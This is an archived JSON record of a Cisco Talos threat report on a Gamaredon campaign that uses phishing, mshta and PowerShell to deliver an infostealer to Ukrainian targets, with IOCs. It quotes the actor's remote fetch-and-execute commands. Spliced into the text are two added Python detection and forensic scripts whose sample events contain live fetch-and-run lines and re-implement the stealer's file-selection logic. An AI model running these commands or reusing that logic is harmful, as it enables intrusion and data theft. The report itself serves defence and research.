{
	"id": "5b23bb0a-7873-48ec-9159-893fbc21743d",
	"created_at": "2026-04-06T00:16:19.076681Z",
	"updated_at": "2026-04-10T03:37:04.176812Z",
	"deleted_at": null,
	"sha1_hash": "15b2e5eb8aecb56edbc25e9f76c04afc6603fb9a",
	"title": "Gamaredon APT targets Ukrainian government agencies in new campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1541764,
	"plain_text": "Gamaredon APT targets Ukrainian government agencies in new campaign\r\nBy Asheer Malhotra\r\nPublished: 2022-09-15 · Archived: 2026-04-05 21:09:07 UTC\r\nCisco Talos recently identified a new, ongoing campaign attributed to the Russia-linked Gamaredon APT\r\nthat infects Ukrainian users with information-stealing malware.\r\nThe adversary is using phishing documents containing lures related to the Russian invasion of Ukraine.\r\nLNK files, PowerShell and VBScript enable initial access, while malicious binaries are deployed in the\r\npost-infection phase.\r\nWe discovered the use of a custom-made information stealer implant that can exfiltrate victim files of interest and\r\ndeploy additional payloads as directed by the attackers.\r\nCisco Talos discovered Gamaredon APT activity targeting users in Ukraine with malicious LNK files distributed\r\nin RAR archives. The campaign, part of an ongoing espionage operation observed as recently as August 2022,\r\naims to deliver information-stealing malware to Ukrainian victim machines and makes heavy use of multiple\r\nmodular PowerShell and VBScript (VBS) scripts as part of the infection chain. The infostealer is a dual-purpose\r\nmalware that includes capabilities for exfiltrating specific file types and deploying additional binary and script-based payloads on an infected endpoint.\r\nhttps://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nPage 1 of 15\n\nThe adversary uses phishing emails to deliver Microsoft Office documents containing remote templates with\r\nmalicious VBScript macros. These macros download and open RAR archives containing LNK files that\r\nsubsequently download and activate the next-stage payload on the infected endpoint. 
We observed considerable\r\noverlap between the tactics, techniques and procedures (TTPs), malware artifacts and infrastructure used in this\r\ncampaign and those used in a series of attacks the Ukraine Computer Emergency Response Team (CERT-UA)\r\nrecently attributed to Gamaredon.\r\nWe also observed intrusion attempts against several Ukrainian entities. Based on these observations and\r\nGamaredon's operational history of almost exclusively targeting Ukraine, we assess that this latest campaign is\r\nalmost certainly directly targeting entities based in Ukraine.\r\nAttack Chain\r\nInitial Access\r\nGamaredon APT actors likely gained initial footholds into targeted networks through malicious Microsoft Office\r\ndocuments distributed via email. This is consistent with spear-phishing techniques common to this APT.\r\nMalicious VBS macros concealed within remote templates execute when the user opens the document. The\r\nmacros download RAR archives containing LNK files. The RAR archives in this campaign follow a date-based\r\nnaming pattern:\r\n31.07.2022.rar\r\n04.08.2022.rar\r\n10.08.2022.rar\r\nThese compressed archives usually contain just the LNK file. The LNK files and Microsoft Office document\r\nnames contain references pertinent to the Russian invasion of Ukraine.\r\nExecution\r\nOnce opened, the LNKs will attempt to execute MSHTA.EXE to download and parse a remote XML file to\r\nexecute a malicious PowerShell script:\r\nmshta.exe hxxp://a0704093.xsph[.]ru/bass/grudge.xml /f\r\nGamaredon is known to use the domain xsph[.]ru. The servers in this campaign only allow access from IP\r\naddresses inside the Ukrainian address space.\r\nThis PowerShell script decodes and executes a second PowerShell script (instrumentor), which collects data from\r\nthe victim and reports back to a remote server. 
This script also allows the remote server to send a PowerShell\r\ncommand or binary blob containing encrypted VBScript (VBS) code to be executed locally:\r\n[Figure: Second-stage PowerShell script that runs additional commands and payloads on the endpoint.]\r\nThe instrumentor PowerShell script usually consists of a function that decodes the encrypted response from the\r\ncommand and control (C2) server and executes it as a VBScript object. The key used in the XOR decoder is\r\ncalculated from the machine's volume serial number plus index parameters passed in the response blob. This\r\nmakes the content hard to decode for an observer who does not have both values.\r\nThe PowerShell script also repeatedly captures the current user's screen. This code uses the\r\n\"System.Windows.Forms\" object to capture a copy of the virtual desktop, including setups with multiple screens.\r\nThe screen capture is executed nine times, but the resulting screenshot is always saved to \"%TEMP%\\test.png\",\r\nwhich gets overwritten every time. The resulting PNG image is then converted to a base64-encoded string,\r\nstored in a variable, and the screenshot file is removed from the disk.\r\nThe script then uploads the victim's information to the remote server. The following information is\r\ncollected and exfiltrated to a hardcoded C2 URL:\r\nComputer name.\r\nVolume serial number.\r\nBase64-encoded screenshot.\r\nUpon sending the system information, the server response is parsed to see if there are commands to be executed.\r\nThe whole script loops up to four times, so up to four different commands can be executed per run.\r\nThe code checks if the first character is an exclamation point (\"!\"). 
If so, the remainder of the response is expected\r\nto be PowerShell code that is passed directly to the IEX command. The output of that command is then added to\r\nthe variable \"cmd\" and sent back to the C2 server.\r\nIf the response starts with any other character, it is treated as an encrypted blob and passed to the decoder\r\nfunction, along with the volume serial number, to be decoded and executed as VBScript.\r\n[Figure: Infection chain diagram.]\r\nPayloads\r\nYet another PowerShell script\r\nOne of the payloads served to the instrumentor script was PowerShell code used to set an environment variable\r\ncontaining PowerShell code and a Registry RUN key to run it every time the user logs in.\r\n[Figure: PowerShell script setting up the RUN key to execute another PowerShell script stored in the environment variable.]\r\nThere are two key components to this script:\r\nThe Get-IP function: This function queries a DNS lookup service for an attacker-specified domain and uses\r\none of the returned IP addresses as the IP to download the next payloads.\r\nNext-stage payload: The PowerShell script uses the IP address to construct a URL that serves the next-stage PowerShell script, which is subsequently stored in \"$env:Include\" and executed when the user logs in\r\n(via the HKCU Run key).\r\n[Figure: Persistence script fetching the remote location's IP.]\r\nThe PowerShell code residing in the environment variable is meant to provide the attackers with continued access\r\nto the infected endpoint with the capability to deploy additional payloads as desired. 
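As an added example (not code from the Talos post or from the actor's scripts), the following Python hunts for the stages described above in Sysmon-style endpoint telemetry: mshta.exe launched with a remote URL (the LNK stage), a Run entry that starts PowerShell to evaluate an environment variable, PowerShell evaluating that variable at logon, the script body itself being written into a user environment variable, and a Run value named \"Windows Task\" (the value name given under the indicators later in the post). Every event, SID, value and command line below is constructed for the example; field names follow Sysmon (EventID 1 process creation, EventID 13 registry value set), and paths are written with '/' because the matcher folds separators before comparing.

```python
# Added example: hunting the LNK -> mshta -> PowerShell chain and the
# env-variable persistence described above in Sysmon-style telemetry.
# All events below are constructed; none are from the Talos post.

# Tokens that suggest PowerShell code rather than an ordinary path or value
PS_TOKENS = ('iex', 'invoke-expression', 'new-object', 'downloadstring', 'frombase64string')


def norm(s):
    # Sysmon writes registry and file paths with backslashes; fold them to '/'
    # (chr(92) is a backslash) and lower-case so rules are separator- and
    # case-insensitive.
    return s.replace(chr(92), '/').lower()


def hunt(events):
    # Returns (event index, rule name) pairs for every rule that fires.
    findings = []
    for i, ev in enumerate(events):
        if ev.get('EventID') == 1:  # process creation
            image = norm(ev.get('Image', '')).rsplit('/', 1)[-1]
            cmd = norm(ev.get('CommandLine', ''))
            # LNK stage: mshta.exe pulling its script from a remote server
            if image == 'mshta.exe' and ('http://' in cmd or 'https://' in cmd):
                findings.append((i, 'mshta_remote_content'))
            # Logon stage: PowerShell evaluating code held in an env variable
            if (image.startswith('powershell') and '$env:' in cmd
                    and ('iex' in cmd or 'invoke-expression' in cmd)):
                findings.append((i, 'powershell_exec_from_env_var'))
        elif ev.get('EventID') == 13:  # registry value set
            target = norm(ev.get('TargetObject', ''))
            details = ev.get('Details', '').lower()
            if '/currentversion/run/' in target:
                if 'powershell' in details and '$env:' in details:
                    findings.append((i, 'run_key_launches_env_var_script'))
                if target.rsplit('/', 1)[-1] == 'windows task':
                    findings.append((i, 'run_value_named_windows_task'))
            # The script body is stored as a user environment variable
            if '/environment/' in target and sum(t in details for t in PS_TOKENS) >= 2:
                findings.append((i, 'powershell_stored_in_env_var'))
    return findings


SAMPLE_EVENTS = [  # constructed telemetry, Sysmon field names, '/' separators
    {'EventID': 1, 'Image': 'C:/Windows/System32/mshta.exe',
     'ParentImage': 'C:/Windows/explorer.exe',
     'CommandLine': 'mshta.exe http://a0704093.xsph.ru/bass/grudge.xml /f'},
    {'EventID': 13,
     'TargetObject': 'HKU/S-1-5-21-1000-2000-3000-1001/Software/Microsoft/Windows/CurrentVersion/Run/Windows Task',
     'Details': 'powershell -w hidden -nop -c iex $env:Include'},
    {'EventID': 1, 'Image': 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe',
     'ParentImage': 'C:/Windows/explorer.exe',
     'CommandLine': 'powershell -w hidden -nop -c iex $env:Include'},
    {'EventID': 13,
     'TargetObject': 'HKU/S-1-5-21-1000-2000-3000-1001/Environment/Include',
     'Details': 'function Get-IP {...}; IEX (New-Object Net.WebClient).DownloadString($u)'},
    {'EventID': 1, 'Image': 'C:/Windows/System32/mshta.exe',   # benign: local HTA
     'ParentImage': 'C:/Windows/explorer.exe',
     'CommandLine': 'mshta.exe C:/Users/alice/tools/report.hta'},
    {'EventID': 13,                                             # benign: ordinary Run entry
     'TargetObject': 'HKU/S-1-5-21-1000-2000-3000-1001/Software/Microsoft/Windows/CurrentVersion/Run/OneDrive',
     'Details': 'C:/Users/alice/AppData/Local/Microsoft/OneDrive/OneDrive.exe /background'},
]

if __name__ == '__main__':
    for idx, rule in hunt(SAMPLE_EVENTS):
        print(idx, rule)
```

The two benign events bound the rules: a local .hta run through mshta.exe and an ordinary Run entry are not flagged. Because this stage keeps its script in an environment variable rather than in a file, file-based scanning has nothing to hash; the registry write that sets the variable (EventID 13 under the user's Environment key) and the Run entry that evaluates it are the durable detection points. The '$env:' plus IEX condition is deliberately narrow; widen PS_TOKENS when tuning for a fleet.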
A similar PowerShell script\r\nwas described in CERT-UA's recent alert describing intrusions conducted by Gamaredon in the first half of 2022\r\nusing the GammaLoad and GammaSteel implants.\r\n[Figure: PowerShell script stored in the env variable.]\r\nThis script uses the same Get-IP() function to get a random IP assigned to the domain and queries a URL\r\nconstructed from the IP address and a hardcoded extended resource. Just like the previous script, the computer\r\nname and volume serial number are used again in communications with the C2 server. The C2 server uses them to\r\nencode the next-stage payload subsequently served to the script.\r\nIf the response from the C2 starts with the string \"http\", the content is treated as the URL to download the final\r\npayload binary. The Volume Serial Number and Computer Name are passed to this URL and the response is\r\ndecoded using the XorBytes function.\r\n[Figure: PowerShell function used to decode payloads from C2 server.]\r\nThe decrypted binary is then saved to the \"%TEMP%\" folder with a name consisting of a random string of\r\nnumbers and the \".exe\" file extension and is executed.\r\nAlternatively, if the response from the C2 does not begin with the \"http\" string, the content is treated as a VBS and\r\nexecuted via a COM object.\r\nInfostealer\r\nOne of the executables deployed by the attackers via the PowerShell script consisted of an information stealer that\r\nexfiltrates files of specific extensions from the infected endpoint: .doc, .docx, .xls, .rtf, .odt, .txt, .jpg, .jpeg, .pdf,\r\n.ps1, .rar, .zip, .7z and .mdb. 
This is a new infostealer that Gamaredon has not previously used in other campaigns.\r\nWe suspect it may be a component of Gamaredon's \"Giddome\" backdoor family, but we are unable to confirm that\r\nat this time.\r\nThe malicious binary keeps track of what has been exfiltrated in a file named \"profiles_c.ini\" in the\r\n\"%USERPROFILE%\\Appdata\\Local\" folder. The malware stores the MD5 hash of a string containing the\r\nfilename, file size and modification date of the exfiltrated file.\r\nOnce started, the malware scans all attached storage devices looking for files with the aforementioned extensions.\r\nFor each one, the malware makes a POST request with metadata about the exfiltrated file and its content.\r\n[Figure: POST data to exfiltrate files.]\r\nThe parameter \"p\" contains metadata about the stolen file and the victim machine using the following format:\r\n%u&&%s&&%s&&%s&&%s&&%s\r\nWhere the various parameters are:\r\n<Hard_coded_value>&&<File_name>&&<File_Modification_Date_time>&&<FileSize>&&__&&\r\n<Computer_Name>&&<Username>&&<Victim_ID_randomly_generated_string_12_chars>&&<Volume Serial Number>\r\nThe raw content of the file comes after the metadata. The request is made to a random URI under the parent C2\r\ndomain. The implant generates a random 12-character string that acts as a subdomain for the C2 domain to send\r\nrequests to:\r\nE.g. <random_12_char_string>[.]celticso[.]ru\r\nThe implant will also search for the relevant file extensions in fixed and remote drives and specifically in the\r\n\"C:\\Users\" folder. 
The implant enumerates all the files recursively\r\nin the directories on the system while avoiding\r\nenumeration of any folder containing the following strings in the path:\r\nprogram files\r\nprogram files (x86)\r\nprogramdata\r\nperflogs\r\nprog\r\nwindows\r\nappdata\r\nlocal\r\nroaming\r\nAvoiding these folders is likely an attempt by the malware to avoid exfiltrating system files, thereby focusing on\r\nuser files of interest only.\r\nFor each file exfiltrated to the C2, the implant calculates the MD5 hash of the following information and stores it\r\nin the \"%LocalAppData%\\profiles_c.ini\" file:\r\n<file_path><File_size><File_modification_date_time>\r\nThe implant also steals files from removable drives connected to the infected endpoint. When the implant finds a\r\nremovable drive, it looks for files with the file extensions listed earlier. Once a file is found, the implant creates a\r\nrandomly named folder in the %TEMP% directory and copies the original file from its original location to:\r\n%Temp%\\<randomly_named_folder>\\connect\\<removable_vol_serial_number>\\<original file path>\r\nFor example, a user file found on a removable drive \"E:\" at path \"E:\\top_secret_docs\\isengard.doc\" will be copied to\r\n\"%temp%\\<randomly_named_folder>\\connect\\<removable_vol_serial_number>\\top_secret_docs\\isengard.doc\"\r\nThe contents of the folder in the temp directory are subsequently exfiltrated to the C2.\r\nDeliver payloads\r\nAs with this actor's previous tools (e.g., the PS1 scripts), this binary also parses the server response and downloads\r\nadditional payloads if requested. 
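Before the payload-delivery details, an added worked example (not the implant's code and not from the Talos post) of the collection logic from the Infostealer section above: the extension filter, the folder-substring exclusions, the %TEMP% staging path for removable drives, and the MD5 record written to profiles_c.ini, turned into a forensic helper that takes the lines of a recovered profiles_c.ini and a file listing from a disk image and reports which files the implant had already sent. The sample listing, volume serial and folder name are constructed. The record is hashed over <file_path><File_size><File_modification_date_time> as the post states, but the post does not give the timestamp encoding or any separators, so the exact byte layout used here (Windows path string, decimal size, 'YYYY-MM-DD HH:MM:SS', no separators) is an assumption to confirm against the sample before relying on the matches.

```python
# Added example: reproduces the infostealer's file selection and its
# profiles_c.ini de-duplication record for forensic use. Not the implant's
# code; the record byte layout is an assumption (see tracker_record).
import hashlib
from pathlib import PureWindowsPath

# File extensions the implant collects (from the post)
TARGET_EXTS = {'.doc', '.docx', '.xls', '.rtf', '.odt', '.txt', '.jpg', '.jpeg',
               '.pdf', '.ps1', '.rar', '.zip', '.7z', '.mdb'}
# Folders are skipped when any of these strings appears in the directory path
SKIP_SUBSTRINGS = ('program files', 'program files (x86)', 'programdata', 'perflogs',
                   'prog', 'windows', 'appdata', 'local', 'roaming')


def is_candidate(path):
    # True when the implant would collect this file: targeted extension and no
    # excluded substring in the directory part of the path (case-insensitive).
    p = PureWindowsPath(path)
    if p.suffix.lower() not in TARGET_EXTS:
        return False
    folder = str(p.parent).lower()
    return not any(s in folder for s in SKIP_SUBSTRINGS)


def select_candidates(listing):
    return [path for path, _size, _mtime in listing if is_candidate(path)]


def tracker_record(path, size, mtime):
    # MD5 over <file_path><File_size><File_modification_date_time>.
    # ASSUMPTION: plain concatenation of the Windows path string, the decimal
    # size and a 'YYYY-MM-DD HH:MM:SS' timestamp; the post gives the fields
    # and their order, not the encoding.
    data = f'{PureWindowsPath(path)}{size}{mtime}'
    return hashlib.md5(data.encode('utf-8')).hexdigest()


def exfiltrated_files(ini_lines, listing):
    # ini_lines: lines of a recovered %LocalAppData%/profiles_c.ini, assumed
    # to hold one hex MD5 per line. listing: (path, size, mtime) tuples from
    # the disk image. Returns the listed files whose record is in the ini.
    known = {line.strip().lower() for line in ini_lines if line.strip()}
    return sorted(path for path, size, mtime in listing
                  if tracker_record(path, size, mtime) in known)


def staging_path(temp_dir, random_folder, removable_serial, src):
    # Where a file from a removable drive is copied before upload:
    # %TEMP%/<random folder>/connect/<removable volume serial>/<path minus drive>
    parts = PureWindowsPath(src).parts
    return PureWindowsPath(temp_dir, random_folder, 'connect', removable_serial, *parts[1:])


SAMPLE_LISTING = [  # constructed: (path, size in bytes, modification time)
    ('C:/Users/alice/Documents/budget.xls', 51200, '2022-08-04 09:12:33'),
    ('C:/Users/alice/Desktop/orders.pdf', 98304, '2022-08-10 17:45:02'),
    ('C:/Users/alice/Progress/plan.docx', 20480, '2022-07-31 08:00:00'),          # skipped: folder matches 'prog'
    ('C:/Users/alice/AppData/Local/Temp/notes.txt', 1024, '2022-08-01 12:00:00'), # skipped: 'appdata'
    ('C:/Users/alice/Documents/report.xlsx', 30720, '2022-08-05 10:00:00'),       # .xlsx is not targeted
    ('E:/top_secret_docs/isengard.doc', 40960, '2022-08-09 08:30:00'),            # removable drive
]

# Constructed profiles_c.ini: the implant had already sent the first two files,
# plus one record for a file that no longer exists on the image.
SAMPLE_INI_LINES = [
    tracker_record(*SAMPLE_LISTING[0]),
    tracker_record(*SAMPLE_LISTING[1]),
    hashlib.md5(b'record-of-a-deleted-file').hexdigest(),
]

if __name__ == '__main__':
    print('would collect:', select_candidates(SAMPLE_LISTING))
    print('already exfiltrated:', exfiltrated_files(SAMPLE_INI_LINES, SAMPLE_LISTING))
    print(staging_path('C:/Users/alice/AppData/Local/Temp', 'k3j2h9', '1A2B3C4D', SAMPLE_LISTING[5][0]))
```

Two points the sample makes that the description alone does not: the substring match on 'prog' also skips ordinary user folders such as Progress, so the implant's own blind spots are predictable, and the tracker only lets you prove exfiltration for files still present with unchanged size and mtime, because the record carries no file hash. A leftover connect folder under %TEMP% is the cheaper artifact to search for when removable media were involved.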
The response from the server consists of a flag indicating how the data should be\r\ntreated:\r\nFlag             | Payload type | Action\r\n1                | EXE          | Written to disk and executed.\r\n2                | VBS          | Written to disk and executed using wscript.exe.\r\nAny other value  | Blob of data | Written to a file on disk in the %TEMP% folder.\r\n[Figure: Code depicting the dropping of additional payloads.]\r\nThere are other indications this malware may be present on the system, listed below:\r\nA Run entry (registry value) named \"Windows Task\" is created under\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run for persistence\r\nA mutex is created with the name Global\\flashupdate_r\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. 
Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org. Snort Rules 60517-60539 are available for this threat.\r\nOrbital Queries\r\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints\r\nare infected with this specific threat. For specific OSqueries on this threat, click here and here.\r\nIOCs\r\nThe IOC list is also available in Talos' Github repo 
here.\r\nMalicious Documents\r\n4aa2c783ae3d2d58f12d5e89282069533a80a7ba6f7fe6c548c6230a9601e650\r\nLNK Files\r\n581ed090237b314a9f5cd65076cd876c229e1d51328a24effd9c8d812eaebe6a\r\n34bf1a232870df28809597d49a70d9b549d776e1e4beb3308ff6d169a59ecd02\r\n78c6b489ac6cebf846aab3687bbe64801fdf924f36f312802c6bb815ed6400ba\r\n1cb2d299508739ae85d655efd6470c7402327d799eb4b69974e2efdb9226e447\r\na9916af0476243e6e0dbef9c45b955959772c4d18b7d1df583623e06414e53b7\r\n8294815c2342ff11739aff5a55c993f5dd23c6c7caff2ee770e69e88a7c4cb6a\r\nbe79d470c081975528c0736a0aa10214e10e182c8948bc4526138846512f19e7\r\n5264e8a8571fe0ef689933b8bc2ebe46b985c9263b24ea34e306d54358380cbb\r\nff7e8580ce6df5d5f5a2448b4646690a6f6d66b1db37f887b451665f4115d1a2\r\n1ec69271abd8ebd1a42ac1c2fa5cdd9373ff936dc73f246e7f77435c8fa0f84c\r\nRAR Files\r\n750bcec54a2e51f3409c83e2100dfb23d30391e20e1c8051c2bc695914c413e3\r\nInfostealer\r\n139547707f38622c67c8ce2c026bf32052edd4d344f03a0b37895b5de016641a\r\nMalicious URLs\r\nhxxp://a0698649.xsph[.]ru/barley/barley.xml\r\nhxxp://a0700343.xsph[.]ru/new/preach.xml\r\nhxxp://a0700462.xsph[.]ru/grow/guests.xml\r\nhxxp://a0700462.xsph[.]ru/seek/lost.xml\r\nhxxp://a0701919.xsph[.]ru/head/selling.xml\r\nhxxp://a0701919.xsph[.]ru/predator/decimal.xml\r\nhxxp://a0701919.xsph[.]ru/registry/prediction.xml\r\nhxxp://a0704093.xsph[.]ru/basement/insufficient.xml\r\nhxxp://a0704093.xsph[.]ru/bass/grudge.xml\r\nhxxp://a0705076.xsph[.]ru/ramzeses1.html\r\nhxxp://a0705076.xsph[.]ru/regiment.txt\r\nhxxp://a0705269.xsph[.]ru/bars/dearest.txt\r\nhxxp://a0705269.xsph[.]ru/instruct/deaf.txt\r\nhxxp://a0705269.xsph[.]ru/prok/gur.html\r\nhxxp://a0705581.xsph[.]ru/guinea/preservation.txt\r\nhxxp://a0705880.xsph[.]ru/band/sentiment.txt\r\nhxxp://a0705880.xsph[.]ru/based/pre.txt\r\nhxxp://a0705880.xsph[.]ru/selection/seedling.txt\r\nhxxp://a0706248.xsph[.]ru/reject/headlong.txt\r\nhxxp://a0707763.xsph[.]ru/decipher/prayer.txt\r\nAdditional Payload Drop Sites\r\nhxxp://155.138.252[.]221/get.php\r\nhxxp://45.77.237[.]252/get.php\r\nhxxp://motoristo[.]ru/get.php\r\nhxxp://heato[.]ru/index.php\r\nhxxps://<random_string>.celticso[.]ru\r\n162[.]33[.]178[.]129\r\nkuckuduk[.]ru\r\npasamart[.]ru\r\ncelticso[.]ru\r\nSource: https://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/"
	],
	"report_names": [
		"gamaredon-apt-targets-ukrainian-agencies"
	],
	"threat_actors": [
		{
			"id": "236a8303-bf12-4787-b6d0-549b44271a19",
			"created_at": "2024-06-04T02:03:07.966137Z",
			"updated_at": "2026-04-10T02:00:03.706923Z",
			"deleted_at": null,
			"main_name": "IRON TILDEN",
			"aliases": [
				"ACTINIUM ",
				"Aqua Blizzard ",
				"Armageddon",
				"Blue Otso ",
				"BlueAlpha ",
				"Dancing Salome ",
				"Gamaredon",
				"Gamaredon Group",
				"Hive0051 ",
				"Primitive Bear ",
				"Shuckworm ",
				"Trident Ursa ",
				"UAC-0010 ",
				"UNC530 ",
				"WinterFlounder "
			],
			"source_name": "Secureworks:IRON TILDEN",
			"tools": [
				"Pterodo"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434579,
	"ts_updated_at": 1775792224,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/15b2e5eb8aecb56edbc25e9f76c04afc6603fb9a.pdf",
		"text": "https://archive.orkl.eu/15b2e5eb8aecb56edbc25e9f76c04afc6603fb9a.txt",
		"img": "https://archive.orkl.eu/15b2e5eb8aecb56edbc25e9f76c04afc6603fb9a.jpg"
	}
}